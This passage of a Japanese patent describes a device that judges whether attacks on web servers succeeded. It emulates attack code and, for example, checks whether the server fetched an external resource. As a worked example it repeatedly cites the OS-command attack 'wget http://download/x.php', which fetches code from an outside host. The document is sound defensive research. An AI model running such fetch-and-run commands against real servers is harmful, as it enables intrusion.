この場合、判定装置10cが当該攻撃リクエストを受信すると((1))、攻撃コード解析部123は、当該攻撃リクエストに含まれる攻撃コードの攻撃タイプ(A.OSコマンドを悪用する攻撃タイプ)に応じたエミュレーションを行う。そして、攻撃コード解析部123は、当該攻撃コード(例えば、wget http://download/x.php)と、当該攻撃コードの実行により行われる処理(例えば、攻撃コードに記載されるwebサイト(download)へのアクセス)とを対応付けた情報を、webサーバへの攻撃成功時の特徴として、特徴DB114に記憶する((2))。
その後、判定装置10cの特徴検査部125は、上記のような攻撃リクエストを受信した当該webサーバの動作に、(2)で記憶された特徴があるか否かを判定する。例えば、特徴検査部125は、当該webサーバのアクセスログ等を参照して、当該webサーバが、攻撃リクエストの受信後、所定時間以内に攻撃リクエストにより指定される外部リソース(例えば、http://download/x.php)にアクセスしたか否かを確認する。
例えば、特徴検査部125は、webサーバが、攻撃リクエストのレスポンス((4))を返したことを検知すると、上記の攻撃リクエストの受信後、所定時間以内に、当該webサーバが、上記の外部リソース(http://download/x.php)へリクエスト(GET http://download/x.php)を送信した((3))か否かを確認する。ここで、特徴検査部125は、当該webサーバが攻撃リクエストの受信後、所定時間以内に、当該外部リソース(例えば、http://download/x.php)にアクセスしたことを確認できた場合、攻撃は成功したと判定する((5):検査結果 攻撃は成功と判定)。一方、特徴検査部125は、当該webサーバが攻撃リクエストの受信後、所定時間以内に、当該外部リソース(例えば、http://download/x.php)にアクセスしていなかった場合、攻撃は失敗したと判定する。
このような判定装置10cによれば、攻撃コードの本体が外部リソースにあるような場合についても、攻撃が成功したか否かを判定することができる。
[その他の実施形態]
なお、各実施形態で述べた判定装置10a,10b,10cにおける攻撃検知部121は、判定装置10の外部に設置されていてもよい。例えば、図10の符号101,102に示すように、判定装置10a,10b,10cの外部に設置されるWAF等の攻撃検知機器により実現されてもよい。また、判定装置10a,10b,10cは、図10の符号101に示すように、攻撃の成否の判定対象となるwebサーバと直接接続する構成(インライン構成)としてもよいし、図10の符号102に示すように、webサーバとWAF等の攻撃検知機器経由で接続する構成(タップ構成)としてもよい。
[プログラム]
また、上記の実施形態で述べた判定装置10の機能を実現するプログラムを所望の情報処理装置(コンピュータ)にインストールすることによって実装できる。例えば、パッケージソフトウェアやオンラインソフトウェアとして提供される上記のプログラムを情報処理装置に実行させることにより、情報処理装置を判定装置10として機能させることができる。ここで言う情報処理装置には、デスクトップ型またはノート型のパーソナルコンピュータが含まれる。また、その他にも、情報処理装置にはスマートフォン、携帯電話機やPHS(Personal Handyphone System)等の移動体通信端末、さらには、PDA(Personal Digital Assistants)等がその範疇に含まれる。また、判定装置10を、クラウドサーバに実装してもよい。
図11を用いて、上記のプログラム(判定プログラム)を実行するコンピュータの一例を説明する。図11に示すように、コンピュータ1000は、例えば、メモリ1010と、CPU1020と、ハードディスクドライブインタフェース1030と、ディスクドライブインタフェース1040と、シリアルポートインタフェース1050と、ビデオアダプタ1060と、ネットワークインタフェース1070とを有する。これらの各部は、バス1080によって接続される。
メモリ1010は、ROM(Read Only Memory)1011およびRAM(Random Access Memory)1012を含む。ROM1011は、例えば、BIOS(Basic Input Output System)等のブートプログラムを記憶する。ハードディスクドライブインタフェース1030は、ハードディスクドライブ1090に接続される。ディスクドライブインタフェース1040は、ディスクドライブ1100に接続される。ディスクドライブ1100には、例えば、磁気ディスクや光ディスク等の着脱可能な記憶媒体が挿入される。シリアルポートインタフェース1050には、例えば、マウス1110およびキーボード1120が接続される。ビデオアダプタ1060には、例えば、ディスプレイ1130が接続される。
ここで、図11に示すように、ハードディスクドライブ1090は、例えば、OS1091、アプリケーションプログラム1092、プログラムモジュール1093およびプログラムデータ1094を記憶する。前記した実施形態で説明した各種データや情報は、例えばハードディスクドライブ1090やメモリ1010に記憶される。
そして、CPU1020が、ハードディスクドライブ1090に記憶されたプログラムモジュール1093やプログラムデータ1094を必要に応じてRAM1012に読み出して、上述した各手順を実行する。
なお、上記の判定プログラムに係るプログラムモジュール1093やプログラムデータ1094は、ハードディスクドライブ1090に記憶される場合に限られず、例えば、着脱可能な記憶媒体に記憶されて、ディスクドライブ1100等を介してCPU1020によって読み出されてもよい。あるいは、上記のプログラムに係るプログラムモジュール1093やプログラムデータ1094は、LAN(Local Area Network)やWAN(Wide Area Network)等のネットワークを介して接続された他のコンピュータに記憶され、ネットワークインタフェース1070を介してCPU1020によって読み出されてもよい。
10 判定装置
11 記憶部
111 攻撃タイプ別キーワードリスト
112 特徴候補DB
113 レスポンスDB
114 特徴DB
121 攻撃検知部
122 攻撃タイプ判定部
123 攻撃コード解析部
124 特徴選定部
125 特徴検査部

Claims (8)

  1. 攻撃コードによるサーバへの攻撃が成功したか否かを判定する判定装置であって、
    前記サーバへの攻撃リクエストに含まれる攻撃コードの攻撃タイプを判定する攻撃タイプ判定部と、
    前記判定された攻撃タイプに応じ、前記サーバへの前記攻撃コードによる攻撃のエミュレーションを実施し、前記エミュレーションの結果、前記サーバへの攻撃に成功した場合に前記サーバからのレスポンスに現れる特徴を抽出する特徴抽出部と、
    前記判定の対象となる前記サーバからのレスポンスが、前記抽出した特徴を有する場合、前記攻撃コードによる攻撃が成功したと判定する判定部と
    を備えることを特徴とする判定装置。
  2. 前記特徴抽出部が抽出した特徴から、文字列長が所定の閾値以下、または、攻撃ではないリクエストのレスポンスに所定の閾値以上出現する特徴を除外して、前記判定部に出力する選択部をさらに備える
    ことを特徴とする請求項1に記載の判定装置。
  3. 前記攻撃タイプ判定部は、
    前記攻撃コードに含まれるキーワードを用いて、前記攻撃コードの攻撃タイプが、OS(Operating System)コマンドを用いる攻撃タイプか、プログラムコードを用いる攻撃タイプか、SQLコマンドを用いる攻撃タイプか、HTTP(HyperText Transfer Protocol)レスポンスを用いる攻撃タイプか、ファイル操作を用いる攻撃タイプかを判定する
    ことを特徴とする請求項1に記載の判定装置。
  4. 前記特徴抽出部は、さらに、
    前記攻撃コードの一部による攻撃のエミュレーションを実施し、前記エミュレーションの結果、前記攻撃コードの一部の実行により前記サーバへの攻撃に成功した場合に前記サーバからのレスポンスに現れる特徴を抽出する
    ことを特徴とする請求項1に記載の判定装置。
  5. 前記特徴抽出部は、
    前記攻撃リクエストに含まれる攻撃コードに、前記サーバにおける動作時刻を操作するコードが含まれるとき、前記攻撃の成功した場合にサーバからのレスポンスに現れる特徴として、前記サーバでのリクエストの受信から、前記リクエストに対するレスポンスの送信までのリクエスト処理時間の値を設定する
    ことを特徴とする請求項1に記載の判定装置。
  6. 前記特徴抽出部は、
    前記攻撃リクエストに含まれる攻撃コードに、前記サーバから外部リソースへのアクセスを指示するコードが含まれるとき、前記攻撃の成功した場合にサーバからのレスポンスに現れる特徴として、前記攻撃リクエストの受信から所定時間以内における、前記サーバから前記外部リソースへのアクセスを設定する
    ことを特徴とする請求項1に記載の判定装置。
  7. 攻撃コードによるサーバへの攻撃が成功したか否かを判定する判定方法であって、
    前記サーバへの攻撃リクエストに含まれる攻撃コードの攻撃タイプを判定するステップと、
    前記判定された攻撃タイプに応じ、前記サーバへの前記攻撃コードによる攻撃のエミュレーションを実施し、前記エミュレーションの結果、前記サーバへの攻撃に成功した場合に前記サーバからのレスポンスに現れる特徴を抽出するステップと、
    前記判定の対象となる前記サーバからのレスポンスが、前記抽出した特徴を有する場合、前記攻撃コードによる攻撃が成功したと判定するステップと
    を判定装置が実行することを特徴とする判定方法。
  8. 攻撃コードによるサーバへの攻撃が成功したか否かを判定するための判定プログラムであって、
    前記サーバへの攻撃リクエストに含まれる攻撃コードの攻撃タイプを判定するステップと、
    前記判定された攻撃タイプに応じ、前記サーバへの前記攻撃コードによる攻撃のエミュレーションを実施し、前記エミュレーションの結果、前記サーバへの攻撃に成功した場合に前記サーバからのレスポンスに現れる特徴を抽出するステップと、
    前記判定の対象となる前記サーバからのレスポンスが、前記抽出した特徴を有する場合、前記攻撃コードによる攻撃が成功したと判定するステップと
    をコンピュータに実行させることを特徴とする判定プログラム。
JP2019529770A 2017-07-12 2018-07-11 判定装置、判定方法、および、判定プログラム Active JP6708794B2 (ja)

Applications Claiming Priority (3)

Application Number Priority Date Filing Date Title
JP2017136397 2017-07-12
JP2017136397 2017-07-12
PCT/JP2018/026230 WO2019013266A1 (ja) 2017-07-12 2018-07-11 判定装置、判定方法、および、判定プログラム

Publications (2)

Publication Number Publication Date
JPWO2019013266A1 JPWO2019013266A1 (ja) 2019-11-07
JP6708794B2 true JP6708794B2 (ja) 2020-06-10

Family

ID=65001397

Family Applications (1)

Application Number Title Priority Date Filing Date
JP2019529770A Active JP6708794B2 (ja) 2017-07-12 2018-07-11 判定装置、判定方法、および、判定プログラム

Country Status (5)

Country Link
US (1) US11216554B2 (ja)
EP (1) EP3637292B1 (ja)
JP (1) JP6708794B2 (ja)
AU (1) AU2018298640B2 (ja)
WO (1) WO2019013266A1 (ja)

Families Citing this family (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
EP3961452A1 (en) * 2018-05-04 2022-03-02 Google LLC Detecting injection vulnerabilities of client-side templating systems
JP6867552B2 (ja) 2018-05-21 2021-04-28 日本電信電話株式会社 判定方法、判定装置および判定プログラム
WO2021149119A1 (ja) * 2020-01-20 2021-07-29 日本電信電話株式会社 推定システム及び推定プログラム
KR102229613B1 (ko) * 2021-01-11 2021-03-18 펜타시큐리티시스템 주식회사 머신러닝 자가점검 기능을 이용하는 비대면 인증 기반 웹방화벽 유지보수 방법 및 장치
JPWO2022264239A1 (ja) * 2021-06-14 2022-12-22

Family Cites Families (12)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
JP4159814B2 (ja) * 2002-06-26 2008-10-01 株式会社エヌ・ティ・ティ・データ 双方向型ネットワーク侵入検知システムおよび双方向型侵入検知プログラム
ES2309364T3 (es) * 2003-08-11 2008-12-16 Telecom Italia S.P.A. Procedimiento y sistema de deteccion de una utilizacion no autorizada de una red de comunicaciones.
US8615800B2 (en) * 2006-07-10 2013-12-24 Websense, Inc. System and method for analyzing web content
US9654495B2 (en) * 2006-12-01 2017-05-16 Websense, Llc System and method of analyzing web addresses
US8935773B2 (en) * 2009-04-09 2015-01-13 George Mason Research Foundation, Inc. Malware detector
WO2015186662A1 (ja) * 2014-06-06 2015-12-10 日本電信電話株式会社 ログ分析装置、攻撃検知装置、攻撃検知方法およびプログラム
CN106663171B (zh) * 2014-08-11 2019-12-10 日本电信电话株式会社 浏览器模拟器装置、构建装置、浏览器模拟方法以及构建方法
US9787695B2 (en) * 2015-03-24 2017-10-10 Qualcomm Incorporated Methods and systems for identifying malware through differences in cloud vs. client behavior
EP3295359B1 (en) * 2015-05-15 2020-08-26 Virsec Systems, Inc. Detection of sql injection attacks
EP3144840A1 (en) 2015-09-16 2017-03-22 Mastercard International Incorporated Computer security system
RU2634211C1 (ru) * 2016-07-06 2017-10-24 Общество с ограниченной ответственностью "Траст" Способ и система анализа протоколов взаимодействия вредоносных программ с центрами управления и выявления компьютерных атак
US11681804B2 (en) * 2020-03-09 2023-06-20 Commvault Systems, Inc. System and method for automatic generation of malware detection traps

Also Published As

Publication number Publication date
EP3637292A1 (en) 2020-04-15
US20200201987A1 (en) 2020-06-25
US11216554B2 (en) 2022-01-04
AU2018298640A1 (en) 2020-01-23
JPWO2019013266A1 (ja) 2019-11-07
EP3637292B1 (en) 2022-08-31
AU2018298640B2 (en) 2021-01-07
WO2019013266A1 (ja) 2019-01-17
EP3637292A4 (en) 2021-03-10

Similar Documents

Publication Publication Date Title
JP6708794B2 (ja) 判定装置、判定方法、および、判定プログラム
CN107918733B (zh) 检测网页的恶意元素的系统和方法
US9614863B2 (en) System and method for analyzing mobile cyber incident
RU2637477C1 (ru) Система и способ обнаружения фишинговых веб-страниц
US7721334B2 (en) Detection of code-free files
JP7092192B2 (ja) 判定方法、判定装置および判定プログラム
CN107463844B (zh) Web木马检测方法及系统
US11556640B1 (en) Systems and methods for automated cybersecurity analysis of extracted binary string sets
CN107808095B (zh) 用于检测网页的异常元素的系统和方法
US11550920B2 (en) Determination apparatus, determination method, and determination program
CN111324894A (zh) 一种基于web应用安全的XSS漏洞检测方法及系统
CN112182569A (zh) 一种文件识别方法、装置、设备及存储介质
JP6867552B2 (ja) 判定方法、判定装置および判定プログラム
RU2659741C1 (ru) Способы обнаружения аномальных элементов веб-страниц на основании статистической значимости
WO2022264239A1 (ja) アラート検証装置、アラート検証方法及びアラート検証プログラム
CN115065540B (zh) 检测web漏洞攻击的方法、装置和电子设备
CN108366043A (zh) 一种检测一句话木马的方法及系统
CN114116619A (zh) 文件删除漏洞的防御方法、系统和计算机设备
CN117828608A (zh) 系统漏洞识别方法、装置、设备及介质

Legal Events

Date Code Title Description
A621 Written request for application examination

Free format text: JAPANESE INTERMEDIATE CODE: A621

Effective date: 20190705

TRDD Decision of grant or rejection written
A01 Written decision to grant a patent or to grant a registration (utility model)

Free format text: JAPANESE INTERMEDIATE CODE: A01

Effective date: 20200519

A61 First payment of annual fees (during grant procedure)

Free format text: JAPANESE INTERMEDIATE CODE: A61

Effective date: 20200521

R150 Certificate of patent or registration of utility model

Ref document number: 6708794

Country of ref document: JP

Free format text: JAPANESE INTERMEDIATE CODE: R150